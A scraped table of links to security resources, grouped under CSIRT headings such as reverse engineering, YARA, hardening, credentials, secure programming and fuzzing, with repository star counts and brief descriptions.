| CPU Adventure – Unknown CPU Reversing | : We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it… | ||
| pev | 3 | over 1 year ago | : pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries |
| Sourcetrail | 14,937 | almost 3 years ago | : free and open-source cross-platform source explorer |
| Qiling Framework | : Qiling Advanced Binary Emulation Framework | ||
CSIRT / Reverse Engineering / Obfuscation/Deobfuscation: | |||
| batch_deobfuscator | 145 | about 2 years ago | : Deobfuscate batch scripts obfuscated using string substitution and escape character techniques |
| Tales Of Binary Deobfuscation - Part 1 | |||
| evilquest_deobfuscator | 6 | about 4 years ago | : EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. : Small utility to hash EvilQuest code and cstrings sections |
| Deobfuscating DanaBot’s API Hashing | |||
| XLMMacroDeobfuscator | 572 | 7 months ago | : Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros) |
| syntia | 301 | over 4 years ago | : Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code" |
| Deobfuscation | : recovering an OLLVM-protected program | ||
| Stadeo | 147 | about 3 years ago | : Control-flow-flattening and string deobfuscator |
| Semi-Automatic Code Deobfuscation | 71 | over 3 years ago | |
| msynth | 281 | 6 months ago | : Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions |
CSIRT / Reverse Engineering | |||
| Glasgow Debug Tool | 1,921 | 13 days ago | : Scots Army Knife for electronics |
| windbglib | 323 | about 2 years ago | : Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py |
| VX Underground | |||
CSIRT / Reverse Engineering / VX Underground | |||
| MalwareSourceCode | 15,853 | about 1 month ago | : Collection of malware source code for a variety of platforms in an array of different programming languages |
| VXUG-Papers | 1,146 | almost 3 years ago | : Research code & from members of vx-underground |
CSIRT / Reverse Engineering | |||
| Como automaticamente atachar um processo a um debugger. | (pt-br) | ||
| Taming Virtual Machine Based Code Protection | |||
| HyperDbg Debugger | 2,927 | 5 days ago | : The Source Code of HyperDbg Debugger |
| The HT Editor | 411 | over 1 year ago | : A file editor/viewer/analyzer for executables |
| ImHex | 45,125 | 15 days ago | : A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM |
| playing with little endian | |||
| Finding memory bugs with AddressSanitizer | |||
| flare-floss | 3,255 | 9 days ago | : : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware |
| #BazarBackdoor Group #CobaltStrike Payload | |||
| The Debugging Book | : Tools and Techniques for Automated Software Debugging | ||
| Debugging System with DCI and Windbg | . , | ||
| SCAS/SCASB/SCASW/SCASD | : Scan String, x86 Instruction Set Reference | ||
| dexcalibur | 1,059 | almost 2 years ago | : Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform |
| Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086) | |||
| rr | 9,192 | 4 days ago | : Record and Replay Framework |
| panda | 2,489 | 18 days ago | : Platform for Architecture-Neutral Dynamic Analysis |
| qira | 3,957 | over 2 years ago | : QEMU Interactive Runtime Analyser |
| qemu_blog | 1,362 | about 1 year ago | : A series of posts about QEMU internals |
| Reverse engineering (Absolute) UEFI modules for beginners | |||
| miasm | 3,495 | 3 months ago | : Reverse engineering framework in Python |
| rehex | 2,312 | 5 days ago | : Reverse Engineers' Hex Editor |
| Bless | 66 | almost 6 years ago | : Gtk# Hex Editor (fork) |
| Reverse Engineering the M6 Smart Fitness Bracelet | |||
| Reverse Engineering a Linux executable – hello world | |||
| rizin | 2,711 | 4 days ago | : UNIX-like reverse engineering framework and command-line toolset |
| reFlutter | 1,294 | over 2 years ago | : Flutter Reverse Engineering Framework |
| OpenSecurityTraining2 | : OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training | ||
| Nightmare | is an intro to binary exploitation / reverse engineering course based around ctf challenges | ||
| Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries | |||
| Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how | |||
| capa | 4,885 | 3 days ago | : The FLARE team's open-source tool to identify capabilities in executable files |
| aDLL | 70 | over 3 years ago | Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time |
| pyc2bytecode | 133 | over 1 year ago | : A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*) |
| Reverse Engineering PsExec for fun and knowledge | |||
| Reverse Engineering TikTok's VM Obfuscation | |||
CSIRT / Reverse Engineering / Decompilers | |||
| decompile_java | , using - another java decompiler | ||
| NoVmp | 1,956 | over 3 years ago | : A static devirtualizer for VMProtect x64 3.x powered by VTIL |
| Awesome IDA, x64DBG & OllyDBG plugins | 1,283 | 6 months ago | : A curated list of IDA x64DBG and OllyDBG plugins |
| edb | 2,705 | 3 months ago | is a cross-platform AArch32/x86/x86-64 debugger |
| Interactive Delphi Reconstructor IDR | 968 | over 1 year ago | : a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment |
| PyInstaller Extractor | 2,960 | 10 days ago | |
CSIRT / Reverse Engineering / Yara | |||
| Yara-Rules | 4,178 | 7 months ago | : Repository of yara rules |
| Repository containing Indicators of Compromise and Yara rules | 79 | over 3 years ago | |
| YARA in a nutshell | |||
| yara | 8,316 | about 2 months ago | : The pattern matching swiss knife |
| mkYARA | : Writing YARA rules for the lazy analyst ( ) | ||
| Yara-Rules | 570 | 11 months ago | : Repository of YARA rules made by McAfee ATR Team |
| ReversingLabs YARA Rules | 768 | about 1 month ago | |
| YaraHunts | 95 | over 1 year ago | : Random hunting ordiented yara rules |
| YARA Rules for ProcFilter | 84 | over 7 years ago | |
| ThreatHunting | 568 | about 1 month ago | |
| yara-validator | 39 | about 4 years ago | : Validates yara rules and tries to repair the broken ones |
| Vim Syntax Highlighting for YARA Rules | 31 | 9 months ago | : A Vim syntax-highlighting file for YARA rules covering YARA 4.0 |
CSIRT / Reverse Engineering / Yara / Rules DB: | |||
| xored_pefile_mini | 10 | about 2 years ago | : detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes. by |
CSIRT / Reverse Engineering / Ghidra | |||
| ghidra | : is a software reverse engineering (SRE) framework | ||
| ghidra-firmware-utils | 399 | 7 months ago | : Ghidra utilities for analyzing firmware |
| dragondance | 286 | 5 months ago | : Binary code coverage visualizer plugin for Ghidra |
| Decompiler Analysis Engine | : Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable | ||
| Working With Ghidra's P-Code To Identify Vulnerable Function Calls | |||
| GhIDA | : | ||
| Ghidraaas | 779 | almost 4 years ago | : Ghidra as a Service |
| SVD-Loader for Ghidra | : Simplifying bare-metal ARM reverse engineering | ||
| GhidraX64Dbg | 56 | over 3 years ago | : Extract annoations from Ghidra into an X32/X64 dbg database |
| Reverse Engineering Go Binaries with Ghidra | |||
| Introduction to Reverse Engineering with Ghidra: A Four Session Course | |||
| Ghidra Plugin Development for Vulnerability Research - Part-1 | |||
| AngryGhidra | 562 | 4 months ago | : Use angr in Ghidra |
| Defeating Code Obfuscation with Angr | |||
| ghidra2frida | : The new bridge between Ghidra and Frida | ||
| ghidra-scripts | 92 | about 1 year ago | : A collection of my Ghidra scripts |
| Reversing Raw Binary Firmware Files in Ghidra | |||
| Ghidrathon | 698 | 7 months ago | : The FLARE team's open-source extension to add |
| IDA Graph view with outlined function included | |||
| G-3PO: A Protocol Droid for Ghidra | |||
CSIRT / Frameworks | |||
| Inject code into running Python processes | 2,801 | about 1 year ago | |
| malspider | 418 | about 2 years ago | : Malspider is a web spidering framework that detects characteristics of web compromises |
| AIL-framework | 1,304 | 17 days ago | : AIL framework - : |
CSIRT / Patching | |||
| They Did | Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes . (CVE-2017-11882) | ||
CSIRT / Hardening | |||
| BlueWars | : Capture The Flag Defensivo que aconteceu na H2HC | ||
| CCAT | 442 | over 1 year ago | : Cisco Config Analysis Tool |
| Ciderpress | 48 | about 5 years ago | : Hardened wordpress installer |
| debian-cis | 765 | 2 months ago | : PCI-DSS compliant Debian 7/8 hardening |
| Endlessh | 7,320 | 6 months ago | : an SSH tarpit |
| ERNW Repository of Hardening Guides | 611 | about 3 years ago | : This repository contains various hardening guides compiled by ERNW for various purposes |
| fero | 209 | about 6 years ago | : YubiHSM2-backed signing server |
| FirewallChecker | 101 | about 3 years ago | : A self-contained firewall checker |
| Get SSH login notification on Telegram | |||
| Hardentools | 2,931 | 8 months ago | is a utility that disables a number of risky Windows features |
| How To Secure A Linux Server | 17,554 | about 1 month ago | : An evolving how-to guide for securing a Linux server |
| kconfig-hardened-check | 1,700 | 3 days ago | : A tool for checking the hardening options in the Linux kernel config |
| Implementing Least-Privilege Administrative Models | |||
| Iptables Essentials | 1,483 | over 4 years ago | : Common Firewall Rules and Commands |
| iptables-essentials | 1,483 | over 4 years ago | : Iptables Essentials: Common Firewall Rules and Commands |
| Keyringer | : encrypted and distributed secret sharing software | ||
| Keystone Project | . Github: | ||
| linux-hardened | 5 | over 6 years ago | : Minimal supplement to upstream Kernel Self Protection Project changes |
| List of sites with two factor auth | 3,389 | about 3 hours ago | |
| nftables | : nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework | ||
| Common approaches to securing Linux servers and what runs on them. | Nice article with a lot of resources: | ||
| opmsg | 750 | over 1 year ago | : is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different |
| prowler | 10,867 | about 4 hours ago | : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for |
| reconbf | 47 | about 8 years ago | : Recon system hardening scanner |
| Sarlacc | 44 | over 6 years ago | is an SMTP server that I use in my malware lab to collect spam from infected hosts |
| Secure & Ad-free Internet Anywhere With Streisand and Pi Hole | |||
| Secure Secure Shell | by | ||
| Securing Docker Containers | |||
| securityonion-docs | 84 | 6 days ago | |
| security.txt | : A proposed standard which allows websites to define security policies | ||
| security-txt | 1,797 | almost 2 years ago | : A proposed standard that allows websites to define security policies |
| Hardenize | See your site config with | ||
| Set up two-factor authentication for SSH on Fedora | |||
| solo-hw | 182 | almost 5 years ago | : Hardware sources for Solo |
| ssh-auditor | 608 | 11 months ago | : The best way to scan for weak ssh passwords on your network |
| Streisand | 23,195 | over 3 years ago | sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists |
| The Practical Linux Hardening Guide | 9,947 | over 4 years ago | : 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress |
| tls-what-can-go-wrong | 100 | almost 6 years ago | : TLS - what can go wrong? |
| upvote | 452 | about 3 years ago | : A multi-platform binary whitelisting solution |
| Using a Hardened Container Image for Secure Applications in the Cloud | |||
| Zero-knowledge attestation | |||
| Reverie | : An optimized zero-knowledge proof system | ||
CSIRT / Hardening / RHEL Like systems: | |||
| CentOS7 Lockdown | 73 | almost 3 years ago | |
| RHEL7-CIS | 30 | over 4 years ago | : Ansible RHEL 7 - CIS Benchmark Hardening Script |
| cisecurity | 9 | over 4 years ago | : Configures Linux systems to Center for Internet Security Linux hardening standard |
CSIRT / Hardening | |||
| bdshemu | : The shellcode emulator | ||
| IPv6 Security Best Practices | |||
| auditd | 1,499 | about 1 month ago | : Best Practice Auditd Configuration |
| Hardened/PaX Quickstart | |||
| tosh | 417 | over 3 years ago | : Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code |
CSIRT / Hardening / Kubernetes: | |||
| 9 Kubernetes Security Best Practices Everyone Must Follow | |||
| Kubernetes Hardening Guidance | NSA/CISA | ||
CSIRT / Hardening | |||
| CHAPS | 173 | 7 months ago | : Configuration Hardening Assessment PowerShell Script (CHAPS) |
| Awesome Windows Domain Hardening | 1,749 | almost 5 years ago | : A curated list of awesome Security Hardening techniques for Windows |
| NSA/CISA Kubernetes Hardening Guidance | |||
| Learn and Test DMARC | : Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work | ||
| VideoLan Robots.txt | |||
| ssh & linux cheat sheets | |||
| ssh-audit | 3,417 | about 1 month ago | : SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc) |
CSIRT / Hardening / WebServers / A lot of good posts by geek flare: | |||
| How to Configure SSL Certificate on Google Cloud Load Balancer? | |||
| Nginx Web Server Security & Hardening Guide | |||
| IBM HTTP Server Security & Hardening Guide | |||
| Apache Tomcat Hardening and Security Guide | |||
| How to Enable TLS 1.3 in Nginx, Cloudflare? | |||
| Apache Web Server Hardening & Security Guide | (broken!??) | ||
CSIRT / Hardening / WebServers / CaCerts | |||
| List of free rfc3161 servers. | TSA Servers | ||
| certstream-server | 271 | 8 months ago | : Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir |
CSIRT / Hardening / WebServers / Apache: | |||
| Apache Security | by | ||
| dotdotslash | 418 | 5 months ago | : An tool to help you search for Directory Traversal Vulnerabilities |
| A new security header: Feature Policy | |||
| How do I prevent apache from serving the .git directory? | |||
CSIRT / Hardening / WebServers / Nginx: | |||
| 20 Essential Things to Know if You’re on Nginx Web Server | |||
| Nginx C function | : Create your desired C application on top of nginx module | ||
| NGINX config for SSL with Let's Encrypt certs | |||
| How to Configure Nginx SSL Certifcate Chain | |||
CSIRT / Hardening / WebServers / PHP: | |||
| Cheatsheet for finding vulnerable PHP code using grep | 346 | over 6 years ago | : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function |
| It's All About Time | . - A tool for performing feasibility analyses of timing attacks. : A tool for performing network timing attacks on plaintext and hashed password authentication | ||
| snuffleupagus | 26 | about 1 year ago | : Security module for php7 - Killing bugclasses and virtual-patching the rest! |
| FOPO-PHP-Deobfuscator | 86 | over 7 years ago | : A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator |
| Decode.Tools | : Decode PHP Obfuscator by FOPO | ||
CSIRT / Hardening / WebServers / Ruby: | |||
| TSS - Threshold Secret Sharing | 23 | over 3 years ago | : A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt |
CSIRT / Hardening / WebServers | |||
| IT Security Guidelines for Transport Layer Security (TLS) | |||
| A new security header: Feature Policy | |||
| CAA Mandated by CA/Browser Forum | |||
| dotdotslash | 418 | 5 months ago | : An tool to help you search for Directory Traversal Vulnerabilities |
| ENVOY | is an open source edge and service proxy, designed for cloud-native applications | ||
| ghp | 262 | almost 6 years ago | : A simple web server for serving static GitHub Pages locally |
| LEAR | 168 | almost 6 years ago | : Linux Engine for Asset Retrieval |
| NFHTTP | 588 | over 1 year ago | : A cross platform C++ HTTP library that interfaces natively to other platforms |
| Security/Server Side TLS | by Mozilla | ||
| security.txt | : A proposed standard which allows websites to define security policies | ||
| urlscan.io | : A sandbox for the web | ||
| IT Security Guidelines for Transport Layer Security (TLS) | |||
| QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems. | |||
| Secure Headers | 3,164 | 11 days ago | : Manages application of security headers with many safe defaults |
| HTTP/2: The Sequel is Always Worse | |||
| A File Format to Aid in Security Vulnerability Disclosure | RFC 9116: | ||
CSIRT / Credentials | |||
| WhiteIntel | : WhiteIntel assists companies in identifying compromised credentials through malware campaigns | ||
| Cr3dOv3r | 2,025 | about 1 month ago | Search if your credentials where leaked: |
| pw-pwnage-cfworker | 154 | over 2 years ago | : Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts |
| XSS Exploit code for retrieving passwords stored in a Password Vault | |||
| login_duress | 108 | 3 months ago | : A BSD authentication module for duress passwords |
| XSStrike | 13,378 | 4 months ago | : Most advanced XSS detection suite |
| Was my password leaked? | : Search for creadentials leaked on pwndb | ||
| bitwarden_rs | 39,076 | 7 days ago | : Unofficial Bitwarden compatible server written in Rust |
| pcfg_cracker | 321 | 4 months ago | : Probabilistic Context Free Grammar (PCFG) password guess generator |
| Depix | 26,007 | 3 months ago | : Recovers passwords from pixelized screenshots |
| pwndb | 1,306 | over 3 years ago | : Search for leaked credentials |
| Password Lists | 319 | 6 months ago | : Password lists with top passwords to optimize bruteforce attacks |
| pwndb.py | 1,306 | over 3 years ago | : |
| awsome | 429 | 4 months ago | KeePass :Curated list of KeePass-related projects |
CSIRT / Credentials / awsome | |||
| KeePassium | 1,201 | 7 days ago | : KeePass-compatible password manager for iOS |
| Launch PowerShell Script From Within KeePass And Include Password Secure String Credential | , , | ||
| libkeepass | 103 | about 4 years ago | : Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files |
| KeepassXC-Pwned | 35 | 28 days ago | : Check your keepassxc database against previously breached haveibeenpwned passwords |
CSIRT / Credentials / Tokens | |||
| Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication | |||
| Introducing the Qubes U2F Proxy | |||
| YubiKey-Guide | 11,198 | 19 days ago | : Guide to using YubiKey for GPG and SSH |
| Using a Yubikey for GPG and SSH | : Sebastian Neef - 0day.work | ||
| PIN and Management Key | |||
| Improve login security with challenge-response authentication | |||
| URU Card | : Arduino FIDO2 Authenticator | ||
| YubiKey at Datadog | 495 | 10 months ago | |
| This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys. | 11,198 | 19 days ago | |
| yubikey-ssh-setup | 3,243 | about 1 month ago | |
CSIRT / Secure Programming | |||
| Executable-Space Protection and ASLR | Hardening C/C++ Programs Part II: | ||
| Checklist of the most important security countermeasures when designing, testing, and releasing your API | 22,480 | 7 days ago | |
| sanitizers | 11,517 | 21 days ago | |
| Gitian | is a secure source-control oriented software distribution method | ||
| Canary | 30 | over 5 years ago | : Input Detection and Response |
| Canarytokens | by Thinkst, | ||
| CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS | |||
| How to Know if Someone Access your Files with Canary Tokens | |||
| Wycheproof | 2,787 | 3 months ago | : Project Wycheproof tests crypto libraries against known attacks |
| Web App Security 101 | : Keep Calm and Do Threat Modeling | ||
CSIRT / Secure Programming / SSL/TLS for dummies: | |||
| part 1 | : Ciphersuite, Hashing, Encryption; | ||
| part 2 | : Understanding key exchange algorithm; | ||
| part 3 | : Understanding Certificate Authority | ||
CSIRT / Secure Programming | |||
| heaphopper | 212 | about 2 months ago | : HeapHopper is a bounded model checking framework for Heap-implementations |
| Ristretto | is a technique for constructing prime order elliptic curve groups with non-malleable encodings | ||
| SEI CERT C Coding Standard | : The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community | ||
CSIRT / Secure Programming / SEI CERT C Coding Standard | |||
| MSC24-C. Do not use deprecated or obsolescent functions | |||
| US-CERT: memcpy_s() and memmove_s() | |||
CSIRT / Secure Programming | |||
| Safe C Library | 13 | over 9 years ago | : The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming |
| Field Experience With Annex K — Bounds Checking Interfaces | |||
| TSLint | 5,906 | over 3 years ago | : An extensible linter for the TypeScript language |
| rubocop | 12,650 | 5 days ago | : A Ruby static code analyzer and formatter, based on the community Ruby style guide |
| Librando | : transparent code randomization for just-in-time compilers | ||
| Checked C | : Making C Safe by Extension | ||
| Practical case: Buffer Overflow 0x01 | |||
| pigaios | 635 | almost 2 years ago | : A tool for diffing source codes directly against binaries |
| pigaios | 635 | almost 2 years ago | : A tool for diffing source codes directly against binaries |
| A Git Horror Story | : Repository Integrity With Signed Commits. How to use git securely (signing commits) | ||
| An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure | |||
| Tooling for verification of PGP signed commits | 79,540 | 7 days ago | |
| tlse | 545 | about 1 month ago | : Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library |
| tinyalloc | 778 | 4 months ago | : malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...) |
| Sandboxed API | 1,667 | 7 days ago | : Sandboxed API automatically generates sandboxes for C/C++ libraries |
| HACL* | 1,627 | 9 days ago | : a formally verified cryptographic library written in F* |
| Villoc | 602 | over 4 years ago | : Villoc is a heap visualisation tool, it's a python script that renders a static html file |
| How C array sizes become part of the binary interface of a library | |||
| MazuCC | 516 | about 4 years ago | : A minimalist C compiler with x86_64 code generation |
| When the going gets tough | : Understanding the challenges with Product commoditization in SCA | ||
| huskyCI | 576 | 6 months ago | : huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics |
| GTER 47 | GTS 33 - Dia 2 (parte 1) | (pt-br) : nice talk by Daniel Carlier and Silvia Pimpão | ||
| HTTP Security Headers | A Complete Guide | ||
| SAFECode | : is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods | ||
| Security Code Review 101 | |||
| Elliptic Curve Cryptography Explained | |||
| Cheatsheet for finding vulnerable PHP code using grep | 346 | over 6 years ago | : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function |
| How to Process Passwords as a Software Developer | |||
| QL | 7,701 | 4 days ago | : The libraries and queries that power CodeQL and LGTM.com |
| Sendy is Insecure | : How Not to Implement reCAPTCHA | ||
| Cheating in Elliptic Curve Billiards 2 | Win10 Crypto Vulnerability: | ||
| DevSecOps | : Securing Software in a DevOps World | ||
| GitGuardian Documentation and Resources | 1,917 | over 5 years ago | : Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian |
| Vuln Cost - Security Scanner for VS Code | 202 | over 2 years ago | : Find security vulnerabilities in open source npm packages while you code |
| Most Popular Analysis Tools by Programming Language | |||
| Deepsource | : tool that analyzes your repository | ||
| git-wild-hunt | 292 | almost 2 years ago | : A tool to hunt for credentials in github wild AKA git*hunt |
| shhgit | 3,839 | about 1 year ago | : Ah Find GitHub secrets in real time |
| A Graduate Course in Applied Cryptography | |||
| KaiMonkey | 96 | 11 months ago | : Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code |
| You don’t need reproducible builds. | |||
| Comments on build reproducibility | |||
| Integrating Security in the Development Pipeline | DevSecOps – | ||
| SLSA | 1,555 | 4 days ago | : Supply-chain Levels for Software Artifacts, Proposal |
| DazedAndConfused | is a tool to help determine dependency confusion exposure | ||
| Security Scorecards | 4,600 | 4 days ago | : Security health metrics for Open Source |
| kcare-uchecker | 184 | 9 months ago | : A simple tool to detect outdated shared libraries |
| Package Hunter | : A tool for identifying malicious dependencies via runtime monitoring | ||
| What science can tell us about C and C++'s security | |||
| Awesome AppSec | 6,348 | 5 months ago | : A curated list of resources for learning about application security |
| Comments on build reproducibility | |||
CSIRT / Secure Programming / Web Training | |||
| OWASP Broken Web Applications Project | . repository | ||
| dvna | 705 | 8 months ago | : Damn Vulnerable NodeJS Application |
| VulnLab | 385 | 4 months ago | : A web vulnerability lab project developed by Yavuzlar |
CSIRT / Secure Programming / SAST | |||
| Static analysis powered security scanner for your terraform code | 6,722 | about 2 months ago | |
| Scan | (skæn) is a free open-source security audit tool for modern DevOps teams. : A Free & Open Source DevSecOps Platform | ||
| Coccinelle | : is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code | ||
| brakeman | 7,015 | 10 days ago | : A static analysis security vulnerability scanner for Ruby on Rails applications |
| How disable comments make static analysis tools worse | |||
| A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI | |||
| Potential remote code execution in PyPI | |||
| What's New with SAST + DAST | |||
| DevSecOps with DAST and Security Hub | |||
| Sonarqube Community Branch Plugin | 2,251 | 5 days ago | : A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube |
| SAST Analyzers | |||
| Pip-audit | : Google-backed tool probes Python environments for vulnerable packages | ||
| trivy | 23,679 | 8 days ago | : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues |
| Horusec | |||
| Source Code Analysis Tools | |||
| COVERITY SCAN | |||
| Trojan Source | : invisible Source Code Vulnerabilities | ||
| Warn users when a PR contains some characters | : Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired | ||
| ikos | 2,292 | about 2 months ago | : Static analyzer for C/C++ based on the theory of Abstract Interpretation |
| A Guide On Implementing An Effective SAST Workflow | |||
CSIRT / Secure Programming / Secure Web dev / OWASP: | |||
| Introduction to OWASP Top 10 2021 | |||
| OWASP Web Security Testing Guide | 7,338 | 27 days ago | : The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services |
| OWASP-Testing-Checklist | 1,506 | almost 2 years ago | |
| OWASP-Web-Checklist | 1,750 | over 2 years ago | : OWASP Web Application Security Testing Checklist |
| Projects/OWASP Node js Goat Project | , | ||
| DependencyCheck | 6,441 | 8 days ago | : OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies |
| OWASP Risk Assessment Calculator | |||
| OWASP Top 10 Proactive Controls 2018 | |||
| OWASP API Security Project | |||
| Exploiting OWASP Top 10 API Vulnerabilities | |||
| vAPI | 1,177 | over 1 year ago | is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises |
CSIRT / Secure Programming / Secure Web dev / OWASP: / CheatSheets: | |||
| CheatSheetSeries | 28,160 | 4 days ago | : The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics |
| Password Storage Cheat Sheet | |||
| Database Security Cheat Sheet | |||
CSIRT / Secure Programming / Secure Web dev / OWASP: | |||
| OWASP Cornucopia | |||
CSIRT / Secure Programming / Secure Web dev | |||
| The 2021 CWE Most Important Hardware Weaknesses | |||
| secDevLabs | 901 | about 2 months ago | : A laboratory for learning secure web development in a practical manner |
| Secure Modular Runtimes | |||
| WebSecurity Academy | |||
| Prototype pollution – and bypassing client-side HTML sanitizers | |||
| Understanding the CSRF Vulnerability (A Beginner’s Guide) | |||
| VulnyCode | 398 | over 2 years ago | : PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex |
| PwnMachine | 302 | 4 months ago | : PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters |
| WebSploit Labs | : is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions | ||
| Password Storage Cheat Sheet | |||
| Database Security Cheat Sheet | |||
| Introduction - OWASP Cheat Sheet Series | |||
| Stop Password Masking | : Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures | ||
| Forgot password? Taking over user accounts Kaminsky style | |||
| CWE Top 25 Most Dangerous Software Weaknesses | |||
| Datashare Server Mode | 597 | 8 days ago | |
| GitLab analysis of OWASP Top 10 changes from 2004 to 2021 | |||
| oxAuth | 424 | about 1 month ago | : OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS) |
| Prototype Pollution in Python | |||
CSIRT / Secure Programming / Formal Analysis | |||
| A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs | . / | ||
| SCYTHE's Community Threats Repository | : Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here | ||
CSIRT / Secure Programming / Fuzzing | |||
| Generating Software Tests | ( ) | ||
| afl-unicorn | : Fuzzing Arbitrary Binary Code | ||
| Regaxor | 43 | over 6 years ago | : A regular expression fuzzer |
| BrokenType | 430 | about 5 years ago | : TrueType and OpenType font fuzzing toolset |
| Dizzy-legacy | 34 | over 7 years ago | : Network and USB protocol fuzzing toolkit |
| Start-Hollow.ps1 | 2,613 | about 3 years ago | : My musings with PowerShell |
| auditd-attack | 778 | over 4 years ago | : A Linux Auditd rule set mapped to MITRE's Attack Framework |
| Dizzy-legacy | 34 | over 7 years ago | : Network and USB protocol fuzzing toolkit |
| BFuzz | 309 | almost 2 years ago | : Fuzzing Browsers |
| Structure-Aware Fuzzing with libFuzzer | 1,431 | about 3 years ago | with |
| Fuzzilli | 1,890 | 7 days ago | : A JavaScript Engine Fuzzer |
| Materials from Fuzzing Bay Area meetups | 68 | almost 5 years ago | |
| javafuzz | 228 | over 3 years ago | : Javafuzz is coverage-guided fuzzer for testing Java packages |
| onefuzz | 2,821 | about 1 year ago | : A self-hosted Fuzzing-As-A-Service platform |
| Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage | |||
